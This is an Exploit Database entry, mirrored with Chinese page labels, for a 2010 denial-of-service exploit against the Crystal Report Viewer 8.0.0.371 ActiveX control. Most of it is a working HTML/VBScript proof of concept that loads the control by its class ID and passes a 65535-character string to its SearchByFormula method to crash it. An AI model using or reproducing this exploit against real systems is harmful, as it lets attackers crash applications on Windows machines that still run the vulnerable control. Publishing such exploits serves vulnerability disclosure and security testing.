Crystal Report Viewer 8.0.0.371 – ActiveX Denial of Service

• Exploit Database
• 33 阅读

• 作者： Matthew Bergin
  日期： 2010-11-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15408/

• <html>
  Crystal Reporting Viewer v8.0.0.371
  Author: Matthew Bergin
  Website: www.berginpentesting.com
  Website: www.smashthestack.org
  <object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='target' ></object>
  <script language='vbscript'>
  
  targetFile = "C:\WINDOWS\system32\crviewer.dll"
  prototype= "Sub SearchByFormula ( ByVal formula As String )"
  memberName = "SearchByFormula"
  progid = "CRVIEWERLib.CRViewer"
  argCount = 1
  
  arg1=String(65535, "A")
  
  target.SearchByFormula arg1 
  
  </script>